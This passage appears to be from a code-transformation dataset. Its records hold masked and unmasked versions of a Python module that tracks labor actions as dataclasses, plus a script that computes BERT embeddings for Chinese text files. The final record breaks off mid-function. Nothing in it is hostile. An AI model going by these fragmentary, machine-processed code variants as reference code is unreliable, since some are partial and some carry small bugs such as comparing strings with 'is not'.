\"\"\"\n md_data = re.findall(f'<div id=\"{cls.action_id}\">+[\\\\s\\\\S]+<\\\\/div>',\n md_doc)\n assert len(md_data\n ) == 1, f'multiple divs with id={cls.action_id} were found'\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, 'html.parser')\n tables = soup.div.find_all('table')\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) ->'Actions':\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-4": "<mask token>\nUrl = str\n\n\n@dataclass\nclass Action:\n \"\"\" The class for an action we want to track.\n\n This class is used to manage the data of an individual Action. It is used\n to perform the following:\n - set mandatory/optional fields\n - set meta fields\n - cast an validate data so that it knows how to read datafields from\n markdown and dataframes\n - output actions as for dataframes and markdown\n - create and populate action instances from markdown and dataframes\n \"\"\"\n date: str\n sources: List[Url]\n action: str\n struggles: List[str]\n description: str\n locations: List[str] = None\n companies: List[str] = None\n workers: int = None\n tags: List[str] = None\n author: str = None\n _meta_fields: ClassVar = ['author']\n _valid_struggles: ClassVar = ['ethics', 'pay_and_benefits',\n 'working_conditions', 'discrimination', 'unfair_labor_practices',\n 'job_security']\n _valid_actions: ClassVar = ['strike', 'protest', 'open_letter',\n 'legal_action', 'union_drive', 'union_representation']\n\n @staticmethod\n def is_none(field: Any) ->bool:\n if field is None:\n return True\n elif isinstance(field, float) and math.isnan(field):\n return True\n elif isinstance(field, str) and field.lower() == 'none':\n return True\n elif isinstance(field, (list,)) and len(field) == 0:\n return True\n else:\n return False\n\n def listify(self, field: Union[List[Any], Any]) ->List[Any]:\n if self.is_none(field):\n return None\n elif isinstance(field, (list,)):\n return field\n else:\n return [s.strip().lower() for s in field.split(',')]\n\n def __post_init__(self):\n \"\"\" Used to validate fields. \"\"\"\n self.date = dateparser.parse(self.date).date()\n self.sources = self.listify(self.sources)\n self.struggles = self.listify(self.struggles)\n self.action = self.action.strip().lower()\n self.companies = self.listify(self.companies)\n self.tags = self.listify(self.tags)\n self.locations = self.listify(self.locations)\n self.workers = None if self.is_none(self.workers) else int(self.workers\n )\n assert self.action in self._valid_actions, f\"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}\"\n for struggle in self.struggles:\n assert struggle in self._valid_struggles, f\"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}\"\n for source in self.sources:\n assert BeautifulSoup(source, 'html.parser'\n ).a is not None or urlparse(source\n ).netloc is not '', f\"'{source}' is in valid. source must be a valid url or an html link tag element\"\n self.sources = [(BeautifulSoup(source, 'html.parser').a['href'] if \n 'href' in source else source) for source in self.sources]\n\n def __lt__(self, other):\n \"\"\" Used to make Actions sortable. \"\"\"\n return self.date < other.date\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Action):\n return self.__dict__.items() == other.__dict__.items()\n return False\n\n def to_df(self) ->Dict[str, Any]:\n \"\"\" Return dict of all fields serialized to string \"\"\"\n return {key: self.render_df(key) for key, value in self.__dict__.\n items()}\n\n def render_df(self, field: str) ->str:\n \"\"\" Return the value of the field rendered for df. 
\"\"\"\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n return str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags', 'sources'\n ]:\n return str(value).strip('[').strip(']').replace(\"'\", '').replace(\n '\"', '')\n else:\n return value\n\n def to_md(self, field: str, td: bs4.element.Tag) ->str:\n \"\"\" Convert field for markdown\n\n Takes a td BeautifulSoup object and updates it according to the field\n type so that it renders correctly in markdown.\n \"\"\"\n assert field in self.__dataclass_fields__, f'Cannot serialize {field}. Not a valid field in Action.'\n value = self.__getattribute__(field)\n if field in ['date', 'workers']:\n td.string = str(value)\n elif field in ['locations', 'struggles', 'companies', 'tags']:\n td.string = str(value).strip('[').strip(']').replace(\"'\", ''\n ).replace('\"', '')\n elif field == 'sources':\n ret = []\n for source in value:\n tag = (\n f\"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>\"\n )\n ret.append(tag)\n td.append(BeautifulSoup(html.unescape(', '.join(ret)),\n 'html.parser'))\n else:\n td.string = value\n return td\n\n @classmethod\n def create_from_md(cls, table: bs4.element.Tag) ->'Action':\n \"\"\" Create an Action instance from a md table. \"\"\"\n a = {}\n trs = table.find_all('tr')\n for key, val in table.attrs.items():\n if key != 'class':\n a[key] = val\n for i, tr in enumerate(trs):\n td_key = tr.find('td', class_='field-key')\n td_val = tr.find('td', class_='field-value')\n val = ''.join(str(e) for e in td_val.contents).strip()\n key = ''.join(str(e) for e in td_key.contents).strip()\n a[key] = val\n return cls(**a)\n\n @classmethod\n def create_from_row(cls, row: pd.Series) ->'Action':\n \"\"\" Create an Action instance from a dataframe row. \"\"\"\n fields = [key for key, value in cls.__dataclass_fields__.items() if\n value.type != ClassVar]\n d = {key: value for key, value in row.to_dict().items() if key in\n fields}\n return cls(**d)\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n action_id: ClassVar = 'actions'\n actions: List[Action] = field(default_factory=lambda : [])\n fields: List[str] = field(default_factory=lambda : [key for key, value in\n Action.__dataclass_fields__.items() if value.type != ClassVar])\n\n def __len__(self) ->int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) ->'Actions':\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) ->pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient='list')\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. 
\"\"\"\n soup = BeautifulSoup(f'<div id={self.action_id}></div>', 'html.parser')\n for action in self.actions:\n table = soup.new_tag('table')\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag('tr')\n td_key = soup.new_tag('td', attrs={'class': 'field-key'})\n td_val = soup.new_tag('td', attrs={'class': 'field-value'})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) ->'Actions':\n \"\"\" Create and populate an Actions instance from a Markdown Document. \"\"\"\n md_data = re.findall(f'<div id=\"{cls.action_id}\">+[\\\\s\\\\S]+<\\\\/div>',\n md_doc)\n assert len(md_data\n ) == 1, f'multiple divs with id={cls.action_id} were found'\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, 'html.parser')\n tables = soup.div.find_all('table')\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) ->'Actions':\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-5": "import pandas as pd\nimport math\nimport json\nimport html\nimport bs4\nimport re\nimport dateparser\nfrom bs4 import BeautifulSoup\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nfrom typing import Any, List, Dict, ClassVar, Union\nfrom urllib.parse import urlparse\nfrom .markdown import MarkdownData, MarkdownDocument\n\nUrl = str\n\n\n@dataclass\nclass Action:\n \"\"\" The class for an action we want to track.\n\n This class is used to manage the data of an individual Action. It is used\n to perform the following:\n - set mandatory/optional fields\n - set meta fields\n - cast an validate data so that it knows how to read datafields from\n markdown and dataframes\n - output actions as for dataframes and markdown\n - create and populate action instances from markdown and dataframes\n \"\"\"\n\n date: str\n sources: List[Url]\n action: str\n struggles: List[str]\n description: str\n\n locations: List[str] = None\n companies: List[str] = None\n workers: int = None\n tags: List[str] = None\n author: str = None\n\n _meta_fields: ClassVar = [\"author\"]\n\n _valid_struggles: ClassVar = [\n \"ethics\",\n \"pay_and_benefits\",\n \"working_conditions\",\n \"discrimination\",\n \"unfair_labor_practices\",\n \"job_security\",\n ]\n\n _valid_actions: ClassVar = [\n \"strike\",\n \"protest\",\n \"open_letter\",\n \"legal_action\",\n \"union_drive\",\n \"union_representation\",\n ]\n\n @staticmethod\n def is_none(field: Any) -> bool:\n if field is None:\n return True\n elif isinstance(field, float) and math.isnan(field):\n return True\n elif isinstance(field, str) and field.lower() == \"none\":\n return True\n elif isinstance(field, (list,)) and len(field) == 0:\n return True\n else:\n return False\n\n def listify(self, field: Union[List[Any], Any]) -> List[Any]:\n if self.is_none(field):\n return None\n else:\n if isinstance(field, (list,)):\n return field\n else:\n return [s.strip().lower() for s in field.split(\",\")]\n\n def __post_init__(self):\n \"\"\" Used to validate fields. \"\"\"\n # self.date = datetime.strptime(self.date, \"%Y-%m-%d\").date()\n self.date = dateparser.parse(self.date).date()\n self.sources = self.listify(self.sources)\n self.struggles = self.listify(self.struggles)\n self.action = self.action.strip().lower()\n\n self.companies = self.listify(self.companies)\n self.tags = self.listify(self.tags)\n self.locations = self.listify(self.locations)\n\n self.workers = None if self.is_none(self.workers) else int(self.workers)\n\n # make sure action is a valid action\n assert (\n self.action in self._valid_actions\n ), f\"'{self.action}' is not a valid input. Valid inputs are: {self._valid_actions}\"\n\n # make sure all struggles are valid struggles\n for struggle in self.struggles:\n assert (\n struggle in self._valid_struggles\n ), f\"'{struggle}' is not a valid input. Valid inputs are: {self._valid_struggles}\"\n\n # make sure source is either a url or a html link tag <a>\n for source in self.sources:\n assert (\n BeautifulSoup(source, \"html.parser\").a is not None\n or urlparse(source).netloc is not \"\"\n ), f\"'{source}' is in valid. source must be a valid url or an html link tag element\"\n\n # if html, extract only href from sources\n self.sources = [\n BeautifulSoup(source, \"html.parser\").a[\"href\"]\n if \"href\" in source\n else source\n for source in self.sources\n ]\n\n def __lt__(self, other):\n \"\"\" Used to make Actions sortable. 
\"\"\"\n return self.date < other.date\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. \"\"\"\n if isinstance(other, Action):\n return self.__dict__.items() == other.__dict__.items()\n return False\n\n def to_df(self) -> Dict[str, Any]:\n \"\"\" Return dict of all fields serialized to string \"\"\"\n return {key: self.render_df(key) for key, value in self.__dict__.items()}\n\n def render_df(self, field: str) -> str:\n \"\"\" Return the value of the field rendered for df. \"\"\"\n value = self.__getattribute__(field)\n if field in [\"date\", \"workers\"]:\n return str(value)\n elif field in [\"locations\", \"struggles\", \"companies\", \"tags\", \"sources\"]:\n return str(value).strip(\"[\").strip(\"]\").replace(\"'\", \"\").replace('\"', \"\")\n else:\n return value\n\n def to_md(self, field: str, td: bs4.element.Tag) -> str:\n \"\"\" Convert field for markdown\n\n Takes a td BeautifulSoup object and updates it according to the field\n type so that it renders correctly in markdown.\n \"\"\"\n assert (\n field in self.__dataclass_fields__\n ), f\"Cannot serialize {field}. Not a valid field in Action.\"\n\n value = self.__getattribute__(field)\n\n if field in [\"date\", \"workers\"]:\n td.string = str(value)\n elif field in [\"locations\", \"struggles\", \"companies\", \"tags\"]:\n td.string = (\n str(value).strip(\"[\").strip(\"]\").replace(\"'\", \"\").replace('\"', \"\")\n )\n elif field == \"sources\":\n ret = []\n for source in value:\n tag = (\n f\"<a href='{source}' target='_blank'>{urlparse(source).netloc}</a>\"\n )\n ret.append(tag)\n td.append(BeautifulSoup(html.unescape(\", \".join(ret)), \"html.parser\"))\n else:\n td.string = value\n\n return td\n\n @classmethod\n def create_from_md(cls, table: bs4.element.Tag) -> \"Action\":\n \"\"\" Create an Action instance from a md table. \"\"\"\n a = {}\n trs = table.find_all(\"tr\")\n for key, val in table.attrs.items():\n if key != \"class\":\n a[key] = val\n for i, tr in enumerate(trs):\n td_key = tr.find(\"td\", class_=\"field-key\")\n td_val = tr.find(\"td\", class_=\"field-value\")\n val = \"\".join(str(e) for e in td_val.contents).strip()\n key = \"\".join(str(e) for e in td_key.contents).strip()\n a[key] = val\n return cls(**a)\n\n @classmethod\n def create_from_row(cls, row: pd.Series) -> \"Action\":\n \"\"\" Create an Action instance from a dataframe row. \"\"\"\n fields = [\n key\n for key, value in cls.__dataclass_fields__.items()\n if value.type != ClassVar\n ]\n d = {key: value for key, value in row.to_dict().items() if key in fields}\n return cls(**d)\n\n\n@dataclass\nclass Actions:\n \"\"\" The class for a set of actions.\n\n This class is a collection of actions. It is used to for the four primary\n usecases:\n - to serialize the list of actions into a dataframe\n - to serialize the list of actions into a markdown/html table\n - to create and populate an Actions instance from a dataframe\n - to create and populate an Actions instance from a markdown document\n \"\"\"\n\n action_id: ClassVar = \"actions\"\n actions: List[Action] = field(default_factory=lambda: [])\n fields: List[str] = field(\n default_factory=lambda: [\n key\n for key, value in Action.__dataclass_fields__.items()\n if value.type != ClassVar\n ]\n )\n\n def __len__(self) -> int:\n \"\"\" Get the number of actions. \"\"\"\n return len(self.actions)\n\n def __eq__(self, other):\n \"\"\" Overrides the default implementation for equality. 
\"\"\"\n if isinstance(other, Actions):\n return self.actions == other.actions\n return False\n\n def sort(self, *args, **kwargs) -> \"Actions\":\n \"\"\" Sorts the list of actions. \"\"\"\n self.actions.sort(*args, **kwargs)\n return self\n\n def append(self, action: Action):\n \"\"\" Append an action onto this instance of Actions. \"\"\"\n self.actions.append(action)\n\n def to_df(self) -> pd.DataFrame:\n \"\"\" Converts this instance of Actions to a df. \"\"\"\n data = []\n for action in self.actions:\n data.append(action.to_df())\n df = pd.read_json(json.dumps(data), orient=\"list\")\n return df[self.fields]\n\n def to_md(self):\n \"\"\" Convert this instance of Actions to markdown/HTML. \"\"\"\n soup = BeautifulSoup(f\"<div id={self.action_id}></div>\", \"html.parser\")\n for action in self.actions:\n table = soup.new_tag(\"table\")\n soup.div.append(table)\n for meta_field in Action._meta_fields:\n table[meta_field] = action.__getattribute__(meta_field)\n for field in self.fields:\n if action.__getattribute__(field) is None:\n continue\n if field in Action._meta_fields:\n continue\n tr = soup.new_tag(\"tr\")\n td_key = soup.new_tag(\"td\", attrs={\"class\": \"field-key\"})\n td_val = soup.new_tag(\"td\", attrs={\"class\": \"field-value\"})\n td_key.string = field\n td_val = action.to_md(field, td_val)\n tr.append(td_key)\n tr.append(td_val)\n table.append(tr)\n return soup.prettify()\n\n @classmethod\n def read_from_md(cls, md_doc: MarkdownDocument) -> \"Actions\":\n \"\"\" Create and populate an Actions instance from a Markdown Document. \"\"\"\n md_data = re.findall(fr'<div id=\"{cls.action_id}\">+[\\s\\S]+<\\/div>', md_doc)\n assert len(md_data) == 1, f\"multiple divs with id={cls.action_id} were found\"\n md_data = md_data[0]\n soup = BeautifulSoup(md_data, \"html.parser\")\n tables = soup.div.find_all(\"table\")\n actions = Actions()\n for table in tables:\n action = Action.create_from_md(table)\n actions.append(action)\n return actions\n\n @staticmethod\n def read_from_df(df: pd.DataFrame) -> \"Actions\":\n \"\"\" Create and populate an Actions instance from a dataframe. \"\"\"\n actions = Actions()\n for i, row in df.iterrows():\n action = Action.create_from_row(row)\n actions.append(action)\n return actions\n",
"step-ids": [
10,
13,
19,
23,
25
]
}
|
[
10,
13,
19,
23,
25
] |
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-01-13 15:01
import pickle
import numpy as np
from bert_serving.client import BertClient
from pyhanlp import *
CharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')
# bc = BertClient(ip='192.168.1.88') # ip address of the server
bc = BertClient(ip='127.0.0.1') # ip address of the GPU machine
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
# print(result)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
# print(len(valid))
# exit()
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
# print(result)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
# print(len(valid))
# exit()
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-')
.replace('‘', '\'')
.replace('…', '.')
.replace('坜', '壢')
.replace('唛', '麦')
.replace('ㄅㄆㄇㄈ', '呀呀')
.replace('’', '\''))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
if __name__ == '__main__':
# generate_bert('data/SemEval-2016/news.test.sent.txt', 'data/SemEval-2016/news.test.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/news.valid.sent.txt', 'data/SemEval-2016/news.valid.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/news.train.sent.txt', 'data/SemEval-2016/news.train.bert', embed_fun=embed_sum)
#
# generate_bert('data/SemEval-2016/text.test.sent.txt', 'data/SemEval-2016/text.test.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/text.valid.sent.txt', 'data/SemEval-2016/text.valid.bert', embed_fun=embed_sum)
# generate_bert('data/SemEval-2016/text.train.sent.txt', 'data/SemEval-2016/text.train.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.dev.sent.txt', 'data/embedding/bert_base_sum/cz.pas.dev.bert',
embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.train.sent.txt', 'data/embedding/bert_base_sum/cz.pas.train.bert',
embed_fun=embed_sum)
generate_bert('data/semeval15/cz.id.pas.sent.txt', 'data/embedding/bert_base_sum/cz.id.pas.bert',
embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/dev.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/test.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/train.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.train.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/dev.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/train.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/dev.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/train.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/dev.sent.txt', 'data/embedding/bert_base_sum/ctb.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/test.sent.txt', 'data/embedding/bert_base_sum/ctb.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/train.sent.txt', 'data/embedding/bert_base_sum/ctb.train.bert',
# embed_fun=embed_sum)
|
normal
|
{
"blob_id": "38e167630519b73bffea4ff527bc7b7272a49f1a",
"index": 348,
"step-1": "<mask token>\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-3": "<mask token>\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\nbc = BertClient(ip='127.0.0.1')\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-4": "import pickle\nimport numpy as np\nfrom bert_serving.client import BertClient\nfrom pyhanlp import *\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\nbc = BertClient(ip='127.0.0.1')\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n 